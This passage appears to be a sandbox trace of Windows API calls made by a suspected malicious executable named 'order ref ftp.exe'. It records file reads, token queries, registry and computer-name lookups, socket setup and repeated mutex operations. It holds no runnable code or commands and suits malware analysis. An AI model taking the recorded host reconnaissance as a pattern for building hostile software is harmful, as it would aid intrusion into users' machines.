nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xf2e840, lpOverlapped=0x0 | out: lpBuffer=0x31f0438*, lpNumberOfBytesRead=0xf2e840*=0x1000, lpOverlapped=0x0) returned 1 [0139.827] GetLastError () returned 0x0 [0139.828] ReadFile (in: hFile=0x470, lpBuffer=0x31f0438, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xf2e6e8, lpOverlapped=0x0 | out: lpBuffer=0x31f0438*, lpNumberOfBytesRead=0xf2e6e8*=0x1000, lpOverlapped=0x0) returned 1 [0139.828] GetLastError () returned 0x0 [0139.828] ReadFile (in: hFile=0x470, lpBuffer=0x31f0438, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xf2e6e8, lpOverlapped=0x0 | out: lpBuffer=0x31f0438*, lpNumberOfBytesRead=0xf2e6e8*=0x1000, lpOverlapped=0x0) returned 1 [0139.828] GetLastError () returned 0x0 [0139.828] ReadFile (in: hFile=0x470, lpBuffer=0x31f0438, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xf2e6e8, lpOverlapped=0x0 | out: lpBuffer=0x31f0438*, lpNumberOfBytesRead=0xf2e6e8*=0x1000, lpOverlapped=0x0) returned 1 [0139.828] GetLastError () returned 0x0 [0139.831] ReadFile (in: hFile=0x470, lpBuffer=0x31f0438, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xf2e81c, lpOverlapped=0x0 | out: lpBuffer=0x31f0438*, lpNumberOfBytesRead=0xf2e81c*=0x1000, lpOverlapped=0x0) returned 1 [0139.831] GetLastError () returned 0x0 [0139.831] ReadFile (in: hFile=0x470, lpBuffer=0x31f0438, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xf2e6b0, lpOverlapped=0x0 | out: lpBuffer=0x31f0438*, lpNumberOfBytesRead=0xf2e6b0*=0x5b3, lpOverlapped=0x0) returned 1 [0139.831] GetLastError () returned 0x0 [0139.831] ReadFile (in: hFile=0x470, lpBuffer=0x31f0438, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xf2e79c, lpOverlapped=0x0 | out: lpBuffer=0x31f0438*, lpNumberOfBytesRead=0xf2e79c*=0x0, lpOverlapped=0x0) returned 1 [0139.831] GetLastError () returned 0x0 [0139.831] CloseHandle (hObject=0x470) returned 1 [0139.831] GetLastError () returned 0x0 [0139.834] GetCurrentProcess () returned 0xffffffff [0139.834] GetLastError () returned 0x3f0 [0139.834] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0xf2ecf8 | out: TokenHandle=0xf2ecf8*=0x470) returned 1 [0139.834] GetLastError () returned 0x3f0 [0139.835] GetCurrentProcess () returned 0xffffffff [0139.835] GetLastError () returned 0x3f0 [0139.835] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0xf2ecf8 | out: TokenHandle=0xf2ecf8*=0x46c) returned 1 [0139.835] GetLastError () returned 0x3f0 [0139.836] GetCurrentProcess () returned 0xffffffff [0139.836] GetLastError () returned 0x3f0 [0139.836] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0xf2ea68 | out: TokenHandle=0xf2ea68*=0x474) returned 1 [0139.836] GetLastError () returned 0x3f0 [0139.836] GetFileAttributesExW (in: lpFileName="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\order ref ftp.config" (normalized: "c:\\users\\ciihmnxmn6ps\\desktop\\order ref ftp.config"), fInfoLevelId=0x0, lpFileInformation=0xf2eaa8 | out: lpFileInformation=0xf2eaa8*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0 [0139.836] GetLastError () returned 0x2 [0139.837] GetFullPathNameW (in: lpFileName="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\order ref ftp.config", nBufferLength=0x105, lpBuffer=0xf2e5c0, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\order ref ftp.config", lpFilePart=0x0) returned 0x32 [0139.837] GetLastError () returned 0x2 [0139.837] GetFileAttributesExW (in: lpFileName="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\order ref ftp.config" (normalized: "c:\\users\\ciihmnxmn6ps\\desktop\\order ref ftp.config"), fInfoLevelId=0x0, lpFileInformation=0xf2eaa4 | out: lpFileInformation=0xf2eaa4*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0 [0139.837] GetLastError () returned 0x2 [0139.837] GetCurrentProcess () returned 0xffffffff [0139.837] GetLastError () returned 0x3f0 [0139.837] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0xf2ecf8 | out: TokenHandle=0xf2ecf8*=0x478) returned 1 [0139.837] GetLastError () returned 0x3f0 [0139.837] GetCurrentProcess () returned 0xffffffff [0139.837] GetLastError () returned 0x3f0 [0139.837] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0xf2ecf8 | out: TokenHandle=0xf2ecf8*=0x47c) returned 1 [0139.837] GetLastError () returned 0x3f0 [0139.854] GetCurrentProcess () returned 0xffffffff [0139.854] GetLastError () returned 0x3f0 [0139.854] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0xf2ead4 | out: TokenHandle=0xf2ead4*=0x480) returned 1 [0139.854] GetLastError () returned 0x3f0 [0139.871] GetCurrentProcess () returned 0xffffffff [0139.871] GetLastError () returned 0x3f0 [0139.871] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0xf2eae4 | out: TokenHandle=0xf2eae4*=0x484) returned 1 [0139.871] GetLastError () returned 0x3f0 [0139.876] GetCurrentProcess () returned 0xffffffff [0139.876] GetLastError () returned 0x3f0 [0139.876] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0xf2eb38 | out: TokenHandle=0xf2eb38*=0x488) returned 1 [0139.876] GetLastError () returned 0x3f0 [0139.878] GetCurrentProcess () returned 0xffffffff [0139.878] GetLastError () returned 0x3f0 [0139.878] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0xf2eb48 | out: TokenHandle=0xf2eb48*=0x48c) returned 1 [0139.878] GetLastError () returned 0x3f0 [0139.936] GetCurrentProcess () returned 0xffffffff [0139.936] GetLastError () returned 0x3f0 [0139.936] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0xf2ead4 | out: TokenHandle=0xf2ead4*=0x490) returned 1 [0139.936] GetLastError () returned 0x3f0 [0139.948] GetCurrentProcess () returned 0xffffffff [0139.948] GetLastError () returned 0x3f0 [0139.949] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0xf2eae4 | out: TokenHandle=0xf2eae4*=0x494) returned 1 [0139.949] GetLastError () returned 0x3f0 [0140.152] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="Software\\Microsoft\\Windows NT\\CurrentVersion", ulOptions=0x0, samDesired=0x20019, phkResult=0xf2e6e4 | out: phkResult=0xf2e6e4*=0x498) returned 0x0 [0140.153] RegQueryValueExW (in: hKey=0x498, lpValueName="InstallationType", lpReserved=0x0, lpType=0xf2e72c, lpData=0x0, lpcbData=0xf2e728*=0x0 | out: lpType=0xf2e72c*=0x1, lpData=0x0, lpcbData=0xf2e728*=0xe) returned 0x0 [0140.155] RegQueryValueExW (in: hKey=0x498, lpValueName="InstallationType", lpReserved=0x0, lpType=0xf2e72c, lpData=0x1271d60, lpcbData=0xf2e728*=0xe | out: lpType=0xf2e72c*=0x1, lpData="Client", lpcbData=0xf2e728*=0xe) returned 0x0 [0140.156] RegCloseKey (hKey=0x498) returned 0x0 [0140.156] BCryptGetFipsAlgorithmMode (in: pfEnabled=0xf2eed0 | out: pfEnabled=0xf2eed0) returned 0x0 [0140.159] GetFullPathNameW (in: lpFileName="C:\\Windows\\Microsoft.NET\\Framework\\v2.0.50727\\config\\machine.config", nBufferLength=0x105, lpBuffer=0xf2e974, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\Microsoft.NET\\Framework\\v2.0.50727\\config\\machine.config", lpFilePart=0x0) returned 0x43 [0140.159] GetLastError () returned 0xb7 [0140.160] GetFullPathNameW (in: lpFileName="C:\\Windows\\Microsoft.NET\\Framework\\v2.0.50727\\config\\machine.config", nBufferLength=0x105, lpBuffer=0xf2e9bc, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\Microsoft.NET\\Framework\\v2.0.50727\\config\\machine.config", lpFilePart=0x0) returned 0x43 [0140.160] GetLastError () returned 0xb7 [0140.160] SetErrorMode (uMode=0x1) returned 0x0 [0140.160] GetFileAttributesExW (in: lpFileName="C:\\Windows\\Microsoft.NET\\Framework\\v2.0.50727\\config\\machine.config" (normalized: "c:\\windows\\microsoft.net\\framework\\v2.0.50727\\config\\machine.config"), fInfoLevelId=0x0, lpFileInformation=0xf2ee3c | out: lpFileInformation=0xf2ee3c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x3a6fa1b, ftCreationTime.dwHighDateTime=0x1d2d447, ftLastAccessTime.dwLowDateTime=0x128030a, ftLastAccessTime.dwHighDateTime=0x1d2d447, ftLastWriteTime.dwLowDateTime=0x969f9f4, ftLastWriteTime.dwHighDateTime=0x1d2d447, nFileSizeHigh=0x0, nFileSizeLow=0x65b3)) returned 1 [0140.160] GetLastError () returned 0xb7 [0140.160] SetErrorMode (uMode=0x0) returned 0x1 [0140.160] GetFullPathNameW (in: lpFileName="C:\\Windows\\Microsoft.NET\\Framework\\v2.0.50727\\config\\machine.config", nBufferLength=0x105, lpBuffer=0xf2e998, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\Microsoft.NET\\Framework\\v2.0.50727\\config\\machine.config", lpFilePart=0x0) returned 0x43 [0140.160] GetLastError () returned 0xb7 [0140.160] GetFullPathNameW (in: lpFileName="C:\\Windows\\Microsoft.NET\\Framework\\v2.0.50727\\config\\machine.config", nBufferLength=0x105, lpBuffer=0xf2e924, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\Microsoft.NET\\Framework\\v2.0.50727\\config\\machine.config", lpFilePart=0x0) returned 0x43 [0140.160] GetLastError () returned 0xb7 [0140.185] GetCurrentProcess () returned 0xffffffff [0140.185] GetLastError () returned 0x3f0 [0140.185] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0xf2ead0 | out: TokenHandle=0xf2ead0*=0x49c) returned 1 [0140.185] GetLastError () returned 0x3f0 [0140.186] GetCurrentProcess () returned 0xffffffff [0140.186] GetLastError () returned 0x3f0 [0140.186] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0xf2eae0 | out: TokenHandle=0xf2eae0*=0x498) returned 1 [0140.186] GetLastError () returned 0x3f0 [0140.187] GetCurrentProcess () returned 0xffffffff [0140.187] GetLastError () returned 0x3f0 [0140.188] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0xf2edd4 | out: TokenHandle=0xf2edd4*=0x4a0) returned 1 [0140.188] GetLastError () returned 0x3f0 [0140.220] RasEnumConnectionsW (in: param_1=0x12d6310, param_2=0xf2ee30, param_3=0xf2ee34 | out: param_1=0x12d6310, param_2=0xf2ee30, param_3=0xf2ee34) returned 0x0 [0140.338] WSAStartup (in: wVersionRequired=0x202, lpWSAData=0x1271d60 | out: lpWSAData=0x1271d60) returned 0 [0140.339] GetLastError () returned 0x0 [0140.343] WSASocketW (af=2, type=2, protocol=0, lpProtocolInfo=0x0, g=0x0, dwFlags=0x0) returned 0x4f0 [0140.515] GetLastError () returned 0x0 [0140.515] setsockopt (s=0x4f0, level=65535, optname=128, optval="\x01", optlen=4) returned -1 [0140.515] GetLastError () returned 0x273a [0140.515] closesocket (s=0x4f0) returned 0 [0140.515] GetLastError () returned 0x0 [0140.515] WSASocketW (af=23, type=2, protocol=0, lpProtocolInfo=0x0, g=0x0, dwFlags=0x0) returned 0x4f0 [0140.516] GetLastError () returned 0x0 [0140.516] setsockopt (s=0x4f0, level=65535, optname=128, optval="\x01", optlen=4) returned -1 [0140.516] GetLastError () returned 0x273a [0140.516] closesocket (s=0x4f0) returned 0 [0140.516] GetLastError () returned 0x0 [0140.519] GetCurrentProcess () returned 0xffffffff [0140.519] GetLastError () returned 0x3f0 [0140.519] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0xf2e99c | out: TokenHandle=0xf2e99c*=0x4f0) returned 1 [0140.519] GetLastError () returned 0x3f0 [0140.523] GetCurrentProcess () returned 0xffffffff [0140.523] GetLastError () returned 0x3f0 [0140.523] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0xf2e9ac | out: TokenHandle=0xf2e9ac*=0x4f4) returned 1 [0140.523] GetLastError () returned 0x3f0 [0140.552] GetFullPathNameW (in: lpFileName="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\order ref ftp.exe", nBufferLength=0x105, lpBuffer=0xf2e7a8, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\order ref ftp.exe", lpFilePart=0x0) returned 0x2f [0140.552] GetLastError () returned 0x3f0 [0140.554] GetCurrentProcessId () returned 0xfcc [0140.555] GetComputerNameW (in: lpBuffer=0x1271d60, nSize=0x32387f4 | out: lpBuffer="LHNIWSJ", nSize=0x32387f4) returned 1 [0140.556] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SYSTEM\\CurrentControlSet\\Services\\.NET CLR Networking\\Performance", ulOptions=0x0, samDesired=0x20019, phkResult=0xf2ec0c | out: phkResult=0xf2ec0c*=0x4f8) returned 0x0 [0140.557] RegQueryValueExW (in: hKey=0x4f8, lpValueName="Library", lpReserved=0x0, lpType=0xf2ec48, lpData=0x0, lpcbData=0xf2ec44*=0x0 | out: lpType=0xf2ec48*=0x2, lpData=0x0, lpcbData=0xf2ec44*=0x48) returned 0x0 [0140.570] RegQueryValueExW (in: hKey=0x4f8, lpValueName="Library", lpReserved=0x0, lpType=0xf2ec48, lpData=0x1271d60, lpcbData=0xf2ec44*=0x48 | out: lpType=0xf2ec48*=0x2, lpData="%systemroot%\\system32\\netfxperf.dll", lpcbData=0xf2ec44*=0x48) returned 0x0 [0140.570] RegQueryValueExW (in: hKey=0x4f8, lpValueName="IsMultiInstance", lpReserved=0x0, lpType=0xf2ec54, lpData=0x0, lpcbData=0xf2ec50*=0x0 | out: lpType=0xf2ec54*=0x4, lpData=0x0, lpcbData=0xf2ec50*=0x4) returned 0x0 [0140.572] RegQueryValueExW (in: hKey=0x4f8, lpValueName="IsMultiInstance", lpReserved=0x0, lpType=0xf2ec54, lpData=0xf2ec40, lpcbData=0xf2ec50*=0x4 | out: lpType=0xf2ec54*=0x4, lpData=0xf2ec40*=0x1, lpcbData=0xf2ec50*=0x4) returned 0x0 [0140.572] RegQueryValueExW (in: hKey=0x4f8, lpValueName="First Counter", lpReserved=0x0, lpType=0xf2ec54, lpData=0x0, lpcbData=0xf2ec50*=0x0 | out: lpType=0xf2ec54*=0x4, lpData=0x0, lpcbData=0xf2ec50*=0x4) returned 0x0 [0140.572] RegQueryValueExW (in: hKey=0x4f8, lpValueName="First Counter", lpReserved=0x0, lpType=0xf2ec54, lpData=0xf2ec40, lpcbData=0xf2ec50*=0x4 | out: lpType=0xf2ec54*=0x4, lpData=0xf2ec40*=0x16d0, lpcbData=0xf2ec50*=0x4) returned 0x0 [0140.572] RegCloseKey (hKey=0x4f8) returned 0x0 [0140.573] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SYSTEM\\CurrentControlSet\\Services\\.net clr networking\\Performance", ulOptions=0x0, samDesired=0x20019, phkResult=0xf2ebfc | out: phkResult=0xf2ebfc*=0x4f8) returned 0x0 [0140.573] RegQueryValueExW (in: hKey=0x4f8, lpValueName="CategoryOptions", lpReserved=0x0, lpType=0xf2ec44, lpData=0x0, lpcbData=0xf2ec40*=0x0 | out: lpType=0xf2ec44*=0x4, lpData=0x0, lpcbData=0xf2ec40*=0x4) returned 0x0 [0140.573] RegQueryValueExW (in: hKey=0x4f8, lpValueName="CategoryOptions", lpReserved=0x0, lpType=0xf2ec44, lpData=0xf2ec30, lpcbData=0xf2ec40*=0x4 | out: lpType=0xf2ec44*=0x4, lpData=0xf2ec30*=0x3, lpcbData=0xf2ec40*=0x4) returned 0x0 [0140.573] RegQueryValueExW (in: hKey=0x4f8, lpValueName="FileMappingSize", lpReserved=0x0, lpType=0xf2ec44, lpData=0x0, lpcbData=0xf2ec40*=0x0 | out: lpType=0xf2ec44*=0x4, lpData=0x0, lpcbData=0xf2ec40*=0x4) returned 0x0 [0140.573] RegQueryValueExW (in: hKey=0x4f8, lpValueName="FileMappingSize", lpReserved=0x0, lpType=0xf2ec44, lpData=0xf2ec30, lpcbData=0xf2ec40*=0x4 | out: lpType=0xf2ec44*=0x4, lpData=0xf2ec30*=0x20000, lpcbData=0xf2ec40*=0x4) returned 0x0 [0140.573] RegQueryValueExW (in: hKey=0x4f8, lpValueName="Counter Names", lpReserved=0x0, lpType=0xf2ec44, lpData=0x0, lpcbData=0xf2ec40*=0x0 | out: lpType=0xf2ec44*=0x3, lpData=0x0, lpcbData=0xf2ec40*=0xaa) returned 0x0 [0140.573] RegQueryValueExW (in: hKey=0x4f8, lpValueName="Counter Names", lpReserved=0x0, lpType=0xf2ec44, lpData=0x323af0c, lpcbData=0xf2ec40*=0xaa | out: lpType=0xf2ec44*=0x3, lpData=0x323af0c*, lpcbData=0xf2ec40*=0xaa) returned 0x0 [0140.574] ConvertStringSecurityDescriptorToSecurityDescriptorW () returned 0x1 [0140.576] GetLastError () returned 0x0 [0140.576] CreateFileMappingW (hFile=0xffffffff, lpFileMappingAttributes=0x1271d90, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x20000, lpName="Global\\netfxcustomperfcounters.1.0.net clr networking") returned 0x500 [0140.577] GetLastError () returned 0x0 [0140.579] MapViewOfFile (hFileMappingObject=0x500, dwDesiredAccess=0x2, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x0) returned 0x1040000 [0140.580] VirtualQuery (in: lpAddress=0x1040000, lpBuffer=0xf2ec14, dwLength=0x1c | out: lpBuffer=0xf2ec14*(BaseAddress=0x1040000, AllocationBase=0x1040000, AllocationProtect=0x4, RegionSize=0x20000, State=0x1000, Protect=0x4, Type=0x40000)) returned 0x1c [0140.580] GetLastError () returned 0x0 [0140.580] LocalFree (hMem=0x129ddb0) returned 0x0 [0140.580] RegCloseKey (hKey=0x4f8) returned 0x0 [0140.604] GetVersionExW (in: lpVersionInformation=0x1271d78*(dwOSVersionInfoSize=0x114, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x1271d78*(dwOSVersionInfoSize=0x114, dwMajorVersion=0x6, dwMinorVersion=0x2, dwBuildNumber=0x23f0, dwPlatformId=0x2, szCSDVersion="")) returned 1 [0140.604] GetLastError () returned 0x0 [0140.641] GetVersionExW (in: lpVersionInformation=0x1271d78*(dwOSVersionInfoSize=0x114, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x1271d78*(dwOSVersionInfoSize=0x114, dwMajorVersion=0x6, dwMinorVersion=0x2, dwBuildNumber=0x23f0, dwPlatformId=0x2, szCSDVersion="")) returned 1 [0140.641] GetLastError () returned 0x0 [0140.642] CreateWellKnownSid (in: WellKnownSidType=0x11, DomainSid=0x0, pSid=0x323b914, cbSid=0xf2ebf4 | out: pSid=0x323b914*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=0xb), cbSid=0xf2ebf4) returned 1 [0140.642] GetLastError () returned 0x0 [0140.643] CreateMutexW (lpMutexAttributes=0x323ba64, bInitialOwner=0, lpName="Global\\.net clr networking") returned 0x4f8 [0140.643] GetLastError () returned 0x0 [0140.644] WaitForSingleObject (hHandle=0x4f8, dwMilliseconds=0x1f4) returned 0x0 [0140.644] GetLastError () returned 0x0 [0140.644] CreateWellKnownSid (in: WellKnownSidType=0x11, DomainSid=0x0, pSid=0x323bc38, cbSid=0xf2ebb4 | out: pSid=0x323bc38*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=0xb), cbSid=0xf2ebb4) returned 1 [0140.644] GetLastError () returned 0x0 [0140.644] CreateMutexW (lpMutexAttributes=0x323bd48, bInitialOwner=0, lpName="Global\\.net clr networking") returned 0x0 [0140.644] GetLastError () returned 0x5 [0140.645] OpenMutexW (dwDesiredAccess=0x100001, bInheritHandle=0, lpName="Global\\.net clr networking") returned 0x504 [0140.645] GetLastError () returned 0x5 [0140.645] WaitForSingleObject (hHandle=0x504, dwMilliseconds=0x1f4) returned 0x0 [0140.645] GetLastError () returned 0x5 [0140.645] ReleaseMutex (hMutex=0x504) returned 1 [0140.645] GetLastError () returned 0x5 [0140.645] CloseHandle (hObject=0x504) returned 1 [0140.645] GetLastError () returned 0x5 [0140.645] GetCurrentProcessId () returned 0xfcc [0140.646] GetProcessTimes (in: hProcess=0x504, lpCreationTime=0xf2ebb8, lpExitTime=0xf2ebb0, lpKernelTime=0xf2ebb0, lpUserTime=0xf2ebb0 | out: lpCreationTime=0xf2ebb8, lpExitTime=0xf2ebb0, lpKernelTime=0xf2ebb0, lpUserTime=0xf2ebb0) returned 1 [0140.646] GetLastError () returned 0x5 [0140.646] CloseHandle (hObject=0x504) returned 1 [0140.646] GetLastError () returned 0x5 [0140.646] ReleaseMutex (hMutex=0x4f8) returned 1 [0140.646] GetLastError () returned 0x5 [0140.646] CloseHandle (hObject=0x4f8) returned 1 [0140.646] GetLastError () returned 0x5 [0140.646] CreateWellKnownSid (in: WellKnownSidType=0x11, DomainSid=0x0, pSid=0x323c550, cbSid=0xf2ebf4 | out: pSid=0x323c550*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=0xb), cbSid=0xf2ebf4) returned 1 [0140.646] GetLastError () returned 0x5 [0140.647] CreateMutexW (lpMutexAttributes=0x323c660, bInitialOwner=0, lpName="Global\\.net clr networking") returned 0x4f8 [0140.647] GetLastError () returned 0x0 [0140.647] WaitForSingleObject (hHandle=0x4f8, dwMilliseconds=0x1f4) returned 0x0 [0140.647] GetLastError () returned 0x0 [0140.647] ReleaseMutex (hMutex=0x4f8) returned 1 [0140.647] GetLastError () returned 0x0 [0140.647] CloseHandle (hObject=0x4f8) returned 1 [0140.647] GetLastError () returned 0x0 [0140.647] CreateWellKnownSid (in: WellKnownSidType=0x11, DomainSid=0x0, pSid=0x323cce8, cbSid=0xf2ebf4 | out: pSid=0x323cce8*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=0xb), cbSid=0xf2ebf4) returned 1 [0140.647] GetLastError () returned 0x0 [0140.647] CreateMutexW (lpMutexAttributes=0x323cdf8, bInitialOwner=0, lpName="Global\\.net clr networking") returned 0x4f8 [0140.647] GetLastError () returned 0x0 [0140.647] WaitForSingleObject (hHandle=0x4f8, dwMilliseconds=0x1f4) returned 0x0 [0140.648] GetLastError () returned 0x0 [0140.648] ReleaseMutex (hMutex=0x4f8) returned 1 [0140.648] GetLastError () returned 0x0 [0140.648] CloseHandle (hObject=0x4f8) returned 1 [0140.648] GetLastError () returned 0x0 [0140.648] CreateWellKnownSid (in: WellKnownSidType=0x11, DomainSid=0x0, pSid=0x323d484, cbSid=0xf2ebf4 | out: pSid=0x323d484*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=0xb), cbSid=0xf2ebf4) returned 1 [0140.648] GetLastError () returned 0x0 [0140.648] CreateMutexW (lpMutexAttributes=0x323d594, bInitialOwner=0, lpName="Global\\.net clr networking") returned 0x4f8 [0140.648] GetLastError () returned 0x0 [0140.648] WaitForSingleObject (hHandle=0x4f8, dwMilliseconds=0x1f4) returned 0x0 [0140.648] GetLastError () returned 0x0 [0140.648] ReleaseMutex (hMutex=0x4f8) returned 1 [0140.648] GetLastError () returned 0x0 [0140.648] CloseHandle (hObject=0x4f8) returned 1 [0140.648] GetLastError () returned 0x0 [0140.648] CreateWellKnownSid (in: WellKnownSidType=0x11, DomainSid=0x0, pSid=0x323dc18, cbSid=0xf2ebf4 | out: pSid=0x323dc18*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=0xb), cbSid=0xf2ebf4) returned 1 [0140.648] GetLastError () returned 0x0 [0140.649] CreateMutexW (lpMutexAttributes=0x323dd28, bInitialOwner=0, lpName="Global\\.net clr networking") returned 0x4f8 [0140.649] GetLastError () returned 0x0 [0140.649] WaitForSingleObject (hHandle=0x4f8, dwMilliseconds=0x1f4) returned 0x0 [0140.649] GetLastError () returned 0x0 [0140.649] ReleaseMutex (hMutex=0x4f8) returned 1 [0140.649] GetLastError () returned 0x0 [0140.649] CloseHandle (hObject=0x4f8) returned 1 [0140.649] GetLastError () returned 0x0 [0140.649] CreateWellKnownSid (in: WellKnownSidType=0x11, DomainSid=0x0, pSid=0x323e3ac, cbSid=0xf2ebec | out: pSid=0x323e3ac*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=0xb), cbSid=0xf2ebec) returned 1 [0140.649] GetLastError () returned 0x0 [0140.649] CreateMutexW (lpMutexAttributes=0x323e4bc, bInitialOwner=0, lpName="Global\\.net clr networking") returned 0x4f8 [0140.650] GetLastError () returned 0x0 [0140.650] WaitForSingleObject (hHandle=0x4f8, dwMilliseconds=0x1f4) returned 0x0 [0140.650] GetLastError () returned 0x0 [0140.650] ReleaseMutex (hMutex=0x4f8) returned 1 [0140.650] GetLastError () returned 0x0 [0140.650] CloseHandle (hObject=0x4f8) returned 1 [0140.650] GetLastError () returned 0x0 [0140.650] CreateWellKnownSid (in: WellKnownSidType=0x11, DomainSid=0x0, pSid=0x323eb4c, cbSid=0xf2ebec | out: pSid=0x323eb4c*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=0xb), cbSid=0xf2ebec) returned 1 [0140.650] GetLastError () returned 0x0 [0140.650] CreateMutexW (lpMutexAttributes=0x323ec5c, bInitialOwner=0, lpName="Global\\.net clr networking") returned 0x4f8 [0140.650] GetLastError () returned 0x0 [0140.650] WaitForSingleObject (hHandle=0x4f8, dwMilliseconds=0x1f4) returned 0x0 [0140.650] GetLastError () returned 0x0 [0140.650] ReleaseMutex (hMutex=0x4f8) returned 1 [0140.650] GetLastError () returned 0x0 [0140.650] CloseHandle (hObject=0x4f8) returned 1 [0140.651] GetLastError () returned 0x0 [0140.651] CreateWellKnownSid (in: WellKnownSidType=0x11, DomainSid=0x0, pSid=0x323f2c8, cbSid=0xf2ebec | out: pSid=0x323f2c8*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=0xb), cbSid=0xf2ebec) returned 1 [0140.651] GetLastError () returned 0x0 [0140.651] CreateMutexW (lpMutexAttributes=0x323f3d8, bInitialOwner=0, lpName="Global\\.net clr networking") returned 0x4f8 [0140.651] GetLastError () returned 0x0 [0140.651] WaitForSingleObject (hHandle=0x4f8, dwMilliseconds=0x1f4) returned 0x0 [0140.651] GetLastError () returned 0x0 [0140.651] ReleaseMutex (hMutex=0x4f8) returned 1 [0140.651] GetLastError () returned 0x0 [0140.651] CloseHandle (hObject=0x4f8) returned 1 [0140.651] GetLastError () returned 0x0 [0140.651] CreateWellKnownSid (in: WellKnownSidType=0x11, DomainSid=0x0, pSid=0x323fa54, cbSid=0xf2ebec | out: pSid=0x323fa54*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=0xb), cbSid=0xf2ebec) returned 1 [0140.651] GetLastError () returned 0x0 [0140.652] CreateMutexW 